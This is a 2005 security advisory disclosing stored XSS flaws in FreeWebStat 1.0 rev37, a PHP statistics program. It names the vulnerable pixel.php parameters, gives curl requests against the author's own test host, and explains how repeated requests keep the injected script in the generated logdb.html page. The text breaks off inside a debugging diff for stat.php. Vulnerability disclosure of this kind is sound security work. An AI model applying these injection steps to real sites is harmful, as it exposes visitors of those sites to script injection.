FreeWebStat Multiple XSS Vulnerabilities Name Multiple XSS Vulnerabilities in FreeWebStat Systems Affected FreeWebStat (verified on 1.0 rev37) Severity Medium Risk Vendor www.freewebstat.com Advisory www.ush.it/2005/11/19/free-web-stat/ Author Francesco ‘aScii’ Ongaro (ascii at katamail . com) Date 20051119 I. BACKGROUND FreeWebStat is a PHP stats program, more information is available at the vendor site. II. DESCRIPTION FreeWebStat 1.0 rev37 (the last version at the write time) is vulnerable to multiple XSS. The impact is a little bugger since datas will be stored to file and the result of a single query will persist for some time on the backend. A well-timed loop of requests will assure the XSS to be permanent. We issued an advisory for an other application of the same author called "Php Web Statistik Multiple Vulnerabilities" who said "new version with all fixed bugs can be found under www.freewebstat.com". Well, we downloaded this version and seen the same type of vulnerabilities.. The old advisory: http://www.ush.it/2005/11/19/php-web-statistik/ III. ANALYSIS This vulnerability can be exploited by a GET query. 1) logdb.html XSS logdb.html is vulnerable to JS injection using anti-escape methods (eg: single quotes will be stripped but there are a lot of working workrounds for this) 1.1) Curl the pixel.php curl "http://local.asciistation.zapto.org/fws/pixel.php ?domain= &site= &jsref= &jsres= &jscolor=" -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))" -e "http://www.ush.it" $site, $jsref, &jsres and $jscolor are vulnerable. Loading an url in $jsref will give you a full link (if the logdb.html page have any pr you can drain some of it. 1.2) Call stats.php This will generate the new logdb.html file. 1.3) Visit logdb.html You will see some alerts. : ) The order with the example query is 2 3 2 3 4 5. 1.4) Some test curls ascii> curl "http://local.asciistation. zapto.org/fws/pixel.php?domain=ush.it&site=&jsref=102 4x768&jsres=1337&jscolor=red" -e "http://www.google.it/search?q=lello+splendor++ &hl=it&lr=&start=10&sa=N" -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))" ascii> curl "http://local.asciistation. zapto.org/fws/pixel.php?domain=ush.it&site=aa&jsref=http://ww.tin.it&jsres=1337& jscolor=red" -e "http://www.google.it/search?q=lello+splendor++&hl=it&lr=&start= 10&sa=N" -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))" ascii> curl "http://local.asciistation. zapto.org/fws/pixel.php?domain=ush.it&site=aa&jsref=http://ww.tin.it&jsres=13 37&jscolor=red" -e "http://www.suma.it/" -A "Mozilla/4.0 (compatible; MSIE 6 .0; Windows NT 5.1; SV1; (R1 1.3))" ascii> curl "http://local.asciistation. zapto.org/fws/pixel.php?domain=&site=&jsres=&jscolor= " -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 ; SV1; (R1 1.3))" -e "http://www.ush.it" 2) stat.php search key XSS 2) Detecting the search key XSS - if ( !in_array ( $logfile_entries [ 2 ] , $ip_archive ) ) + if (TRUE) = # save the referer except the own domain name. if the browser value is empty, do not save + echo "DEBUG